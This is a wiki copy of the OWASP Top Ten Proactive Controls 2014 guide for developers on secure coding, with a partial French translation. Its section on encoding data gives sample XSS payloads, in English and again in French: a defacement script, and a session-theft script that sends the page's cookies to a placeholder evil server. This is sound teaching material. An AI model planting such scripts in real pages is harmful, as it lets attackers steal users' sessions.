* [https://www.owasp.org/index.php/User:Cyrille_Grandval Cyrille Grandval] [mailto:cyrille.grandval@owasp.org @] (French Translation)<br />
* Frédéric Baillon [mailto:fbaillon@darkmira.com @] (French Translation)<br />
* Danny Harris [mailto:danny.harris@owasp.org @]<br />
* Stephen de Vries<br />
* Andrew Van Der Stock<br />
* Gaz Heyes<br />
* Colin Watson<br />
* [https://www.owasp.org/index.php/User:Katyanton Katy Anton]<br />
* Jason Coleman<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP Top Ten Project]]<br />
* [[OWASP Mobile Security Project]]<br />
* [[Cheat Sheets]]<br />
<br />
| valign="top" style="padding-left:25px;width:200px;" |<br />
<br />
== Quick Access ==<br />
<br />
<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/images/0/07/OWASP_Proactive_Controls_v1.pdf PDF download].<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/images/3/33/OWASP_Top_Ten_Proactive_Controls_v2.pptx PPT download].<br />
* Top Ten Proactive Controls 2014 [https://www.owasp.org/index.php/OWASP_Proactive_Controls?refresh=1#tab=OWASP_Top_Ten_Proactive_Controls Wiki version].<br />
<br />
== News and Events ==<br />
* [29 Mar 2015] Added Hebrew Translation<br />
* [27 Jan 2015] Added Top Ten Mapping<br />
* [31 Oct 2014] Project presentation uploaded<br />
* [10 Mar 2014] [http://lists.owasp.org/pipermail/owasp-leaders/2014-March/011047.html Request for review]<br />
* [04 Feb 2014] New Wiki Template!<br />
<br />
== Mailing List ==<br />
<br />
Keep up-to-date, participate or ask questions via the [https://lists.owasp.org/mailman/listinfo/owasp_proactive_controls Project Email List].<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| align="center" valign="top" width="50%"| [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= OWASP Top Ten Proactive Controls =<br />
<br />
Software developers are the foundation of any application. In order to achieve secure software, developers must be supported and helped by the organization they author code for. As software developers author the code that makes up a web application, they need to embrace and practice a wide variety of secure coding techniques. All tiers of a web application, the user interface, the business logic, the controller, the database code and more – all need to be developed with security in mind. This can be a very difficult task and developers are often set up for failure. Most developers did not learn about secure coding or crypto in school. The languages and frameworks that developers use to build web applications are often lacking critical core controls or are insecure by default in some way. There may be inherent flaws in requirements and designs. It is also very rare when organizations provide developers with prescriptive requirements that guide them down the path of secure software. When it comes to web security, developers are often set up to lose the security game. <br />
<br />
This document was written by developers for developers, to assist those new to secure development. It aims to guide developers and other software development professionals down the path of secure web application software development.<br />
<br />
There are more than 10 issues that developers need to be aware of. Some of these “top ten” controls will be very specific, others will be general categories. Some of these items are technical, others are process based. Some may argue that this document includes items that are not even controls at all. All of these concerns are fair. Again, this is an awareness document meant for those new to secure software development. It is a start, not an end.<br />
<br />
The number of people who influenced or contributed to this document in some way is to numerous to mentioned. I would also like to thank the entire [[Cheat Sheets]] series team whose content has been pulled from liberally for this document. <br />
<br />
Introducing the OWASP Top Ten Proactive Controls 2014. <br />
<br/><br/><br />
== 1: Parameterize Queries ==<br />
<br />
SQL Injection is one of the most dangerous web application risks due to the fact that SQL Injection is both easy to exploit, with easy to use automated attack tools available, and can deliver an impact to your application that is devastating.<br />
<br />
The simple insertion of malicious SQL code into your web application – and the entire database could potentially be stolen, wiped or modified. The web application can even be used to run dangerous operating system commands against the operating system hosting your database. <br />
<br />
To stop SQL injection, developers must prevent untrusted input from being interpreted as part of a SQL command. The best way to do this is with the programming technique known as Query Parameterization.<br />
<br />
Here is an example of Query Parameterization in Java:<br />
<br />
String newName = request.getParameter("newName");<br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); <br />
pstmt.setString(1, newName); <br />
pstmt.setString(2, id);<br />
<br />
Here is an example of query parameterization in PHP:<br />
<br />
$email = $_REQUEST[‘email’];<br />
$id = $_REQUEST[‘id’];<br />
$stmt = $dbh->prepare(”update users set email=:new_email where id=:user_id”); <br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Key References'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br/><br />
== 2: Encode Data ==<br />
<br />
Encoding is a powerful mechanism to help protect against many types of attack, especially injection attacks. Essentially, encoding involves translating special characters into some equivalent that is no longer significant in the target interpreter. Encoding needed to stop various forms of injection include Unix encoding, Windows encoding, LDAP encoding and XML encoding. Another example of encoding is output encoding necessary to prevent Cross Site Scripting. <br />
<br />
Web developers often build web pages dynamically, consisting of a mix of developer built HTML/JavaScript and database data that was originally populated with user input. This input should be considered to be untrusted data and dangerous, which requires special handling when building a secure web application. Cross Site Scripting (XSS) or, to give it its proper definition, JavaScript injection, occurs when an attacker tricks your users into executing malicious JavaScript that was not originally built into your website. XSS attacks execute in the user's browser and can have a wide variety of effects. <br />
<br />
For example:<br />
<br />
XSS site defacement:<br />
<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
XSS session theft:<br />
<br />
<script><br />
var img = new Image();<br />
img.src=&quot;http&#58;//<some evil server>.com?” + document.cookie;<br />
</script><br />
<br />
There are two broad classes of XSS: Persistent and Reflected. Persistent XSS (or Stored XSS) occurs when an XSS attack can be embedded in a website database or filesystem. This flavor of XSS is more dangerous because users will typically already be logged into the site when the attack is executed, and a single injection attack can affect many different users. Reflected XSS occurs when the attacker places an XSS payload as part of a URL and tricks a victim into visiting that URL. When a victim visits this URL, the XSS attack is launched. This type of XSS is less dangerous since it requires a degree of interaction between the attacker and the victim.<br />
<br />
Contextual output encoding is a crucial programming technique needed to stop XSS. This is performed on output, when you’re building a user interface, at the last moment before untrusted data is dynamically added to HTML. The type of encoding required will depend on the HTML context of where the untrusted data is added, for example in an attribute value, or in the main HTML body, or even in a JavaScript code block. The encoding required to stop XSS include HTML Entity Encoding, JavaScript Encoding and Percent Encoding (aka URL Encoding). OWASP's Java Encoder Project and Enterprise Security API (ESAPI) provides encoders for these functions in Java. In .NET 4.5, the AntiXssEncoder Class provides CSS, HTML, URL, JavaScriptString and XML encoders - other encoders for LDAP and VBScript are included in the open source AntiXSS library. <br />
<br />
'''Key References'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br/><br />
== 3: Validate All Inputs ==<br />
<br />
It is critical to treat all input from outside of the application (for example, from browsers or mobile clients, from outside systems or files) as untrusted. For web applications this includes HTTP headers, cookies, and GET and POST parameters: any or all of this data could be manipulated by an attacker.<br />
<br />
One of the most important ways to build a secure web application is to limit what input a user is allowed to submit to your web application. Limiting user input is a technique called “input validation”. Input validation can be included in web applications in the server-side code using regular expressions. Regular expressions are a kind of code syntax that can help tell if a string matches a certain pattern.<br />
<br />
There are two typical approaches to performing input validation: “white list" and "black list" validation. White list validation seeks to define what good input should look like. Any input that does not meet this “good input” definition should be rejected. “Black list” validation seeks to detect known attacks and only reject those attacks or other known bad characters. “Black list” validation is a more error prone and difficult to maintain approach because it can sometimes be bypassed through encoding and other obfuscation techniques. The blacklist also has to continually be updated as new attacks or encoding techniques are discovered. Because of these weaknesses it is not recommended when building a secure web application. The following examples will focus on white list validation.<br />
<br />
When a user first registers for an account on a hypothetical web application, some of the first pieces of data required are a username, password and email address. If this input came from a malicious user, the input could contain attack strings. By validating the user input to ensure that each piece of data contains only the valid set of characters and meets the expectations for data length, we can make attacking this web application more difficult.<br />
<br />
Let’s start with the following regular expression for the username. <br />
<br />
^[a-z0-9_]{3,16}$<br />
<br />
This regular expression input validation white list of good characters only allows lowercase letters, numbers and the underscore character. The size of the username is also being limited to 3-16 characters in this example. <br />
<br />
Here is an example regular expression for the password field.<br />
<br />
^(?=.*[a-z])(?=.*[A-Z]) (?=.*\d) (?=.*[@#$%]).{10,64}$<br />
<br />
This regular expression ensures that a password is 10 to 64 characters in length and includes a uppercase letter, a lowercase letter, a number and a special character (one or more uses of @, #, $, or %).<br />
<br />
Here is an example regular expression for an email address (per the HTML5 specification http://www.w3.org/TR/html5/forms.html#valid-e-mail-address).<br />
<br />
^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$<br />
<br />
There are special cases for validation where regular expressions are not enough. If your application handles markup -- untrusted input that is supposed to contain HTML -- it can be very difficult to validate. Encoding is also difficult, since it would break all the tags that are supposed to be in the input. Therefore, you need a library that can parse and clean HTML formatted text such as the [[OWASP Java HTML Sanitizer]]. A regular expression is not the right tool to parse and sanitize untrusted HTML.<br />
<br />
Here we illustrate one of the unfortunate truisms about input validation: input validation does not necessarily make untrusted input “safe” since it may be necessary to accept potentially dangerous characters as valid input. The security of the application should then be enforced where that input is used, for example, if it is used to build an HTML response, then the appropriate HTML encoding should be performed to prevent Cross Site Scripting attacks.<br />
<br />
'''Key References''' <br />
* [[Input Validation Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/OWASP_JSON_Sanitizer OWASP JSON Sanitizer Project]<br />
* [https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer OWASP Java HTML Sanitizer Project]<br />
* [http://commons.apache.org/proper/commons-validator/ Apache Commons Validator]<br />
<br/><br />
== 4: Implement Appropriate Access Controls ==<br />
<br />
Authorization (Access Control) is the process where requests to access a particular feature or resource should be granted or denied. It should be noted that authorization is not equivalent to authentication (verifying identity). These terms and their definitions are frequently confused. <br />
<br />
Access Control can be a rather complex and design-heavy security control. The following "positive" access control design requirements should be considered at the initial stages of application development. Once you have chosen a specific access control design pattern, it is often difficult and time consuming to re-engineer access control in your application with a new pattern. Access Control is one of the main areas of application security design that must be heavily thought-through up front. <br />
<br />
=== Force all requests to go through access control checks ===<br />
Most frameworks and languages only check a feature for access control if a programmer adds that check. The inverse is a more security-centric design, where all access is first verified. Consider using a filter or other automatic mechanism to ensure that all requests go through some kind of access control check.<br />
<br />
=== Deny by default ===<br />
In line with automatic access control checking, consider denying all access control checks for features that have not been configured for access control. Normally the opposite is true in that newly created features automatically grant users full access until a developer has added that check. <br />
<br />
=== Avoid hard-coded policy-based access control checks in code ===<br />
Very often, access control policy is hard-coded deep in application code. This makes auditing or proving the security of that software very difficult and time consuming. Access control policy and application code, when possible, should be separated. Another way of saying this is that your enforcement layer (checks in code) and your access control decision making process (the access control "engine") should be separated when possible. <br />
<br />
=== Code to the activity ===<br />
Most web frameworks use role based access control as the primary method for coding enforcement points in code. While it's acceptable to use roles in access control mechanisms, coding specifically to the role in application code is an anti-pattern. Considering checking if the user has access to that feature in code, as opposed to checking what role the user is in code.<br />
<br />
=== Server-side trusted data should drive access control ===<br />
The vast majority of data you need to make an access control decision (who is the user and are they logged in, what entitlements does the user have, what is the access control policy, what feature and data is being requested, what time is it, what geolocation is it, etc) should be retrieved "server-side" in a standard web or web service application. Policy data such as a user's role or an access control rule should never be part of the request. In a standard web application, the only client-side data that is needed for access control is the id or ids of the data being accessed. Most all other data needed to make an access control decision should be retrieved server-side.<br />
<br />
'''Key References'''<br />
* [[Access Control Cheat Sheet]]<br />
* [http://cybersecurity.ieee.org/center-for-secure-design/authorize-after-you-authenticate.html http://cybersecurity.ieee.org/center-for-secure-design/authorize-after-you-authenticate.html]<br />
<br />
'''Key Tool'''<br />
* [https://www.owasp.org/index.php/OWASP_PHPRBAC_Project OWASP PHPRBAC Project]<br />
* [http://shiro.apache.org/authorization-features.html Apache Shiro Authorization features]<br />
<br/><br />
<br />
== 5: Establish Identity and Authentication Controls ==<br />
<br />
Authentication is the process of verifying that an individual or an entity is who it claims to be. Authentication is commonly performed by submitting a user name or ID and one or more items of private information that only a given user should know.<br />
<br />
Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forth between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally impossible to predict.<br />
<br />
Identity management is a broader topic that not only includes authentication and session management, but also covers advanced topics like identity federation, single sign on, password-management tools, identity repositories and more.<br />
<br />
'''Key References'''<br />
* [[Authentication Cheat Sheet]]<br />
* [[Password Storage Cheat Sheet]]<br />
* [[Forgot Password Cheat Sheet]] <br />
* [[Session Management Cheat Sheet]]<br />
<br/><br />
== 6: Protect Data and Privacy ==<br />
<br />
=== Encrypting data in Transit ===<br />
<br />
When transmitting sensitive data, at any tier of your application or network architecture, encryption-in-transit of some kind should be considered. SSL/TLS is by far the most common and widely supported model used by web applications for encryption in transit. Despite published weaknesses in specific implementations (e.g. Heartbleed), it is still the defacto and recommended method for implementing transport layer encryption.<br />
<br />
'''Key References'''<br />
* Proper SSL/TLS configuration: [[Transport Layer Protection Cheat Sheet]]<br />
* Protecting users from man-in-the-middle attacks via fraudulent SSL certificates: [[Pinning Cheat Sheet]]<br />
<br />
=== Encrypting data at Rest ===<br />
<br />
Cryptographic storage is difficult to build securely. It's critical to classify data in your system and determine that data needs to be encrypted, such as the need to encrypt credit cards per the PCI compliance standard. Also, any time you start building your own low-level cryptographic functions on your own, ensure you are or have the assistance of a deep applied expert. Instead of building cryptographic functions from scratch, it is strongly recommended that peer reviewed an open libraries be used instead, such as the Google KeyCzar project, Bouncy Castle and the functions included in SDKs. Also, be prepared to handle the more difficult aspects of applied crypto such as key management, overall cryptographic architecture design as well as tiering and trust issues in complex software.<br />
<br />
A common weakness in encrypting data at rest is using an inadequate key, or storing the key along with the encrypted data (the cryptographic equivalent of leaving a key under the doormat). Keys should be treated as secrets and only exist on the device in a transient state, e.g. entered by the user so that the data can be decrypted, and then erased from memory.<br />
<br />
'''Key References'''<br />
* Information on low level decisions necessary when encrypting data at rest: [[Cryptographic Storage Cheat Sheet]] <br />
* [[Password Storage Cheat Sheet]]<br />
<br />
'''Key Tools'''<br />
* [https://www.owasp.org/index.php/O-Saft OWASP SSL Audit for Testers]<br />
* [https://code.google.com/p/keyczar/ Google KeyCzar]<br />
<br />
=== Implement Protection in Process ===<br />
<br />
Make sure that confidential or sensitive data is not exposed by accident during processing. It may be more accessible in memory; or it could be written to temporary storage locations or log files, where it could be read by an attacker.<br />
<br/><br />
== 7: Implement Logging and Intrusion Detection ==<br />
<br />
Application logging should not be an afterthought or limited to debugging and troubleshooting. Logging is also used in other important activities:<br />
<br />
* Application monitoring<br />
* Business analytics and insight<br />
* Activity auditing and compliance monitoring<br />
* System intrusion detection<br />
* Forensics<br />
<br />
To make correlation and analysis easier, follow a common logging approach within the system and across systems where possible, using an extensible logging framework like SLF4J with Logback or Apache Log4j2, to ensure that all log entries are consistent.<br />
<br />
Process monitoring, audit and transaction logs/trails etc are usually collected for different purposes than security event logging, and this often means they should be kept separate. The types of events and details collected will tend to be different. For example a PCI DSS audit log will contain a chronological record of activities to provide an independently verifiable trail that permits reconstruction, review and examination to determine the original sequence of attributable transactions. <br />
<br />
It is important not to log too much, or too little. Make sure to always log the time stamp and identifying information like the source IP and user-id, but be careful not to log private or confidential data or opt-out data or secrets. Use knowledge of the intended purposes to guide what, when and how much to log. To protect from Log Injection aka [http://www.owasp.org/index.php/Log_Forging Log Forging], make sure to perform encoding on untrusted data before logging it.<br />
<br />
The [[OWASP AppSensor Project]] explains how to implement intrusion detection and automated response into an existing application: where to add sensors or [https://www.owasp.org/index.php/AppSensor_DetectionPoints detection points] and what [http://www.owasp.org/index.php/AppSensor_ResponseActions response actions] to take when a security exception is encountered in your application.<br />
<br />
<br />
'''Key References'''<br />
* How to properly implement logging in an application: [[Logging Cheat Sheet]]<br />
<br />
'''Key Tool'''<br />
* [[OWASP AppSensor Project]]<br />
<br/><br />
== 8: Leverage Security Features of Frameworks and Security Libraries ==<br />
<br />
Starting from scratch when it comes to developing security controls for every web application, web service or mobile application leads to wasted time and massive security holes. Secure coding libraries help software developers guard against security-related design and implementation flaws.<br />
<br />
When possible, the emphasis should be on using the existing features of frameworks rather than importing third party libraries. It is preferable to have developers take advantage of what they're already using instead of foisting yet another library on them. Web application security frameworks to consider include:<br />
<br />
* [http://static.springsource.org/spring-security/site/index.html Spring Security]<br />
* [http://shiro.apache.org/ Apache Shiro]<br />
<br />
It is critical to keep these frameworks and libraries up to date as described in the [https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities <i>using components with known vulnerabilities</i> Top Ten 2013 risk].<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/PHP_Security_Cheat_Sheet PHP Security Cheat Sheet]<br />
* [https://www.owasp.org/index.php/.NET_Security_Cheat_Sheet .NET Security Cheat Sheet]<br />
<br/><br />
== 9: Include Security-Specific Requirements ==<br />
<br />
There are three basic categories of security requirements that can be defined early-on in a software development project:<br />
<br />
1) '''Security Features and Functions''': the visible application security controls for the system, including authentication, access control and auditing functions. These requirements are often defined by use cases or user stories which include input, behavior and output, and can be reviewed and tested for functional correctness by QA staff. For example, checking for re-authentication during change password or checking to make sure that changes to certain data were properly logged.<br />
<br />
2) '''Business Logic Abuse Cases''': Business logic features include multi-step multi-branch workflows that are difficult to evaluate thoroughly and involve money or valuable items, user credentials, private information or command/control functions, for example eCommerce workflows, shipping route choices, or banking transfer validation. The user stories or use cases for these requirements should include exceptions and failure scenarios (what happens if a step fails or times out or if the user tries to cancel or repeat a step?) and requirements derived from "abuse cases". Abuse cases describe how the application's functions could be subverted by attackers. Walking through failures and abuse case scenarios will uncover weaknesses in validation and error handling that impact the reliability and security of the application.<br />
<br />
3) '''Data Classification and Privacy Requirements''': developers must always be aware of any personal or confidential information in the system and make sure that this data is protected. What is the source of the data? Can the source be trusted? Where is the data stored or displayed? Does it have to be stored or displayed? Who is authorized to create it, see it, change it, and is all of this tracked? This will drive the need for data validation, access control, encryption, and auditing and logging controls in the system.<br />
<br />
'''Key References'''<br />
* [[OWASP Application Security Verification Standard Project]]<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model]<br />
* [[Business Logic Security Cheat Sheet]]<br />
* [[Testing for business logic (OWASP-BL-001)]]<br />
<br/><br />
== 10: Design and Architect Security In ==<br />
<br />
There are several areas where you need to be concerned about security in the architecture and design of a system. These include:<br />
<br />
1) '''Know your Tools''': Your choice of language(s) and platform (O/S, web server, messaging, database or NOSQL data manager) will result in technology-specific security risks and considerations that the development team must understand and manage.<br />
<br />
2) '''Tiering, Trust and Dependencies''': Another important part of secure architecture and design is tiering and trust. Deciding what controls to enforce at the client, the web layer, the business logic layer, the data management layer, and where to establish trust between different systems or different parts of the same system. Trust boundaries determine where to make decisions about authentication, access control, data validation and encoding, encryption and logging. Data, sources of data and services inside a trust boundary can be trusted - anything outside of a trust boundary cannot be. When designing or changing the design or a system, make sure to understand assumptions about trust, make sure that these assumptions are valid, and make sure that they are followed consistently.<br />
<br />
3) '''Manage the Attack Surface''': Be aware of the system's Attack Surface, the ways that attackers can get in, or get data out, of the system. Recognize when you are increasing the Attack Surface, and use this to drive risk assessments (should you do threat modeling or plan for additional testing). Are you introducing a new API or changing a high-risk security function of the system, or are you simply adding a new field to an existing page or file?<br />
<br />
'''Key References'''<br />
* [https://www.owasp.org/index.php/Category:Software_Assurance_Maturity_Model Software Assurance Maturity Model (OpenSAMM)]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project Application Security Verification Standard Project]<br />
* [https://www.owasp.org/index.php/Application_Security_Architecture_Cheat_Sheet Application Security Architecture Cheat Sheet]<br />
* [[Attack Surface Analysis Cheat Sheet]]<br />
* [[Threat Modeling Cheat Sheet]]<br />
<br />
= French Translation =<br />
<br />
Le Top Dix des Contrôles Proactifs de l'OWASP est une liste des techniques de sécurité qui devraient être incluses dans tout projet de développement de logiciels. Elles sont classées par ordre d'importance, le chiffre 1 signifiant le plus haut niveau. Ce document a été rédigé par des développeurs pour des développeurs en vue d’aider ceux qui débutent dans la prise en compte de la sécurité dans leur développement.<br />
<br />
# Requêtes Paramétrées<br />
# Encoder les données<br />
# Valider toutes les données entrantes<br />
# Implémenter les contrôles d'accès appropriés<br />
# Établir les contrôles d'identité et d'authentification<br />
# Protéger les données et la vie privée<br />
# Implémenter la journalisation, la gestion d'erreurs et la détection d'intrusion<br />
# Exploiter les fonctionnalités de sécurité des frameworks et bibliothèques de sécurité<br />
# Inclure les exigences de sécurité spécifiques<br />
# Conception et architecture de sécurité<br />
<br />
'''Présentation du Top Dix 2014 des Contrôles Proactifs de l'OWASP'''<br />
<br />
Les développeurs de logiciels sont à l’origine de toutes les applications informatiques. Afin de réaliser un logiciel sécurisé, il est vital qu’ils soient soutenus et aidés par l'organisation pour laquelle ils écrivent le code. Comme ils sont les concepteurs des applications web, il est nécessaire qu’ils intègrent et adoptent un très large éventail de techniques de sécurisation du code. A tous les niveaux du développement d’une application web, l'interface utilisateur, la logique métier, le contrôleur, le code de base de données, etc., il faut avoir à l’esprit la sécurité. Cela représente une tâche qui peut être très difficile et conduit souvent les développeurs à des situations d’échec.<br />
<br />
La plupart des développeurs n'ont pas étudié la sécurité des développements ou la cryptographie pendant leurs études. Pour créer des applications web, ils utilisent des langages et frameworks, et ceux-ci manquent souvent des contrôles de bases essentiels ou ne sont pas, d’une quelconque façon, sécurisés par défaut. De plus, rarement, les entreprises fournissent aux développeurs des exigences normatives qui puissent les guider vers l’écriture de logiciels sécurisés. Et quand bien même elles le font, il peut exister des failles de sécurité inhérentes à ces exigences et à la conception. Les développeurs sont souvent programmés pour perdre la bataille de la sécurité.<br />
<br />
Ce document a été rédigé par des développeurs pour des développeurs en vue d’aider ceux qui débutent dans la prise en compte de la sécurité dans leur développement. Son objectif est de guider les développeurs et tous les professionnels du développement logiciel sur la voie du développement d'applications web sécurisées.<br />
<br />
Il existe plus de 10 problèmes sur lesquels les développeurs doivent porter leur attention. Dans ce top dix, certains sont très spécifiques et d’autres plus généraux. Certains sont d’ordre technique et d’autres concernent les processus de base. Certains diront que ce document comprend des points qui ne sont pas du tout des contrôles. Toutes ces préoccupations sont justes. Encore une fois, c'est un document de sensibilisation destiné aux débutants en développement de logiciels sécurisés. C'est un début, et non une fin.<br />
<br />
Comme un grand nombre de personnes a influencé ou contribué à ce document il est impossible de tous les nommer. Je tiens aussi à remercier particulièrement toute l'équipe des séries Cheat Sheets dont le contenu a été réutilisé pour ce document.<br />
<br/><br/><br />
== 1: Requêtes Paramétrées ==<br />
<br />
L'injection SQL est l’un des risques majeurs pour une application web. Cela est dû au fait que celle-ci est à la fois facile à exploiter avec des outils automatisés très simples et peut aussi avoir un impact dévastateur sur votre application.<br />
<br />
Une simple insertion d'un code malicieux SQL dans votre application - et la totalité de la base de données peut potentiellement être volée, effacée ou modifiée. L'application web peut même être utilisée pour lancer des commandes systèmes contre le système d'exploitation hébergeant la base de données.<br />
<br />
Pour empêcher les injections SQL, les développeurs doivent éviter qu'une donnée non-fiable soit interprétée comme faisant partie d'une commande SQL. La meilleure façon de le faire est à l'aide de la technique de programmation connue sous le nom de Requêtes Paramétrées.<br />
<br />
Voici un exemple de requête paramétrée en Java<br />
String newName = request.getParameter("newName"); <br />
String id = request.getParameter("id");<br />
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");<br />
pstmt.setString(1, newName);<br />
pstmt.setString(2, id);<br />
<br />
Voici un exemple de requête paramétrée en PHP<br />
$email = $_REQUEST['email'];<br />
$id = $_REQUEST['id'];<br />
$stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");<br />
$stmt->bindParam(':new_email', $email);<br />
$stmt->bindParam(':user_id', $id);<br />
<br />
'''Principales références'''<br />
* [[Query Parameterization Cheat Sheet]]<br />
* [https://www.owasp.org/index.php/OWASP_Secure_Coding_Practices_-_Quick_Reference_Guide OWASP Secure Coding Practices Quick Reference Guide]<br />
<br/><br />
== 2: Encoder les données ==<br />
<br />
L’encodage est un mécanisme puissant qui aide à se protéger contre de nombreux types d'attaques, en particulier les attaques par injection. En substance, l’encodage consiste à traduire les caractères spéciaux en un équivalent qui n'a plus de signification pour l'interpréteur cible. Cela permet de contrecarrer les diverses formes d'injections dont l'encodage Unix, Windows, LDAP ou encore XML. Un autre exemple est l'encodage des données de sortie indispensable pour prévenir les Cross Site Scripting.<br />
<br />
Les développeurs Web conçoivent souvent des pages web de façon dynamique. Elles sont constituées d'un mélange de codes HTML / JavaScript et de données issues de base de données constituée initialement avec des données utilisateurs. Toutes ces données doivent être considérées comme des données non fiables et dangereuses, et qui nécessite, si l’on veut construire une application web sécurisée, un traitement spécial. Cross Site Scripting (XSS) ou, pour lui donner sa définition complète, injection JavaScript, se produit quand un attaquant tente d’abuser vos utilisateurs par l'exécution de code JavaScript malveillant qu’il injecte directement dans le code de votre propre site web . Les attaques XSS sont exécutées dans le navigateur de l'utilisateur et peuvent avoir une grande diversité de conséquences.<br />
<br />
Par exemple:<br />
Altération d’un site par XSS<br />
<script>document.body.innerHTML(“Jim was here”);</script><br />
<br />
Vol de session par XSS<br />
<script> var img = new Image(); img.src="http&#x3A;&#x2F;&#x2F;<some evil server>.com?” + document.cookie; </script><br />
<br />
Il existe deux grandes catégories de XSS: persistants et réfléchis. On parle de XSS persistant (ou XSS stocké) quand une attaque XSS peut être intégré dans une base de données ou un système de fichiers d'un site Web. Cette variante de XSS est la plus dangereuse car les utilisateurs sont en général déjà connectés sur le site lorsque l'attaque est exécutée, et une seule attaque par injection peut affecter un grand nombre d’utilisateurs différents. On parle de XSS réfléchie lorsque l'attaquant place des données XSS dans une partie d’une URL et trompe sa victime en lui demandant de visiter cette URL. Quand la victime visite l’URL, l'attaque XSS se lance. Ce type d’attaque est moins dangereux car elle nécessite une interaction entre l'attaquant et la victime.<br />
<br />
L’encodage contextuel de sortie est une technique de programmation indispensable pour déjouer les attaques XSS. Celui-ci est réalisé sur la sortie, lorsque vous développez une interface utilisateur, au dernier moment, avant que les données non fiable soit ajoutée dynamiquement au HTML. Le type d’encodage nécessaire dépendra du contexte du HTML dans lequel les données non fiables sont ajoutées. Par exemple, dans une valeur d'attribut, dans le corps principal HTML, ou même dans un bloc de code JavaScript. L’encodage à utiliser pour contrer une attaque XSS comprend l'encodage des entités HTML, l'encodage JavaScript et l'encodage pourcentage (appelé également l'encodage d'URL). Le projet OWASP Java Encoder et Enterprise Security API (ESAPI) fournissent des encodeurs de ces fonctionnalités pour Java. Pour .NET 4.5, la classe AntiXssEncoder fournit des encodeurs CSS, HTML, URL, pour les chaînes Javascript et XML. D’autres encodeurs pour LDAP et VBScript sont inclus dans la bibliothèque AntiXSS open source.<br />
<br />
'''Principales références'''<br />
* Stopping XSS in your web application: OWASP [[XSS (Cross Site Scripting) Prevention Cheat Sheet]]<br />
* General information about injection: [[Top 10 2013-A1-Injection]]<br />
<br />
'''Outils principaux'''<br />
* [https://www.owasp.org/index.php/OWASP_Java_Encoder_Project OWASP Java Encoder Project]<br />
* [http://msdn.microsoft.com/en-us/security/aa973814.aspx Microsoft .NET AntiXSS Library]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API OWASP ESAPI]<br />
* [https://www.owasp.org/index.php/OWASP_Encoder_Comparison_Reference_Project OWASP Encoder Comparison Reference Project]<br />
<br/><br />
== 3: Valider toutes les données entrantes ==<br />
<br />
Il est absolument essentiel de considérer toutes les données extérieures à l’application (données entrantes) comme non-fiables (par exemple, celles provenant de navigateurs ou clients mobiles, de systèmes extérieurs ou de fichiers). Pour les applications Web, cela inclut les entêtes HTTP, cookies et paramètres GET ou POST. En effet, tout ou partie de ces données peuvent être modifiées par un attaquant.<br />
<br />
L'une des points les plus importants, lors de la création d’une application Web sécurisée, est la limitation des données qu'un utilisateur est autorisé à soumettre à celle-ci. Limiter les données entrantes d'un utilisateur est une technique appelée “validation des données entrantes”. La validation des données entrantes peut être incluse dans le code d’une application web côté serveur en utilisant des expressions régulières. Celles-ci sont une sorte de syntaxe de code qui peut aider à savoir si une chaîne correspond à un certain modèle.<br />
<br />
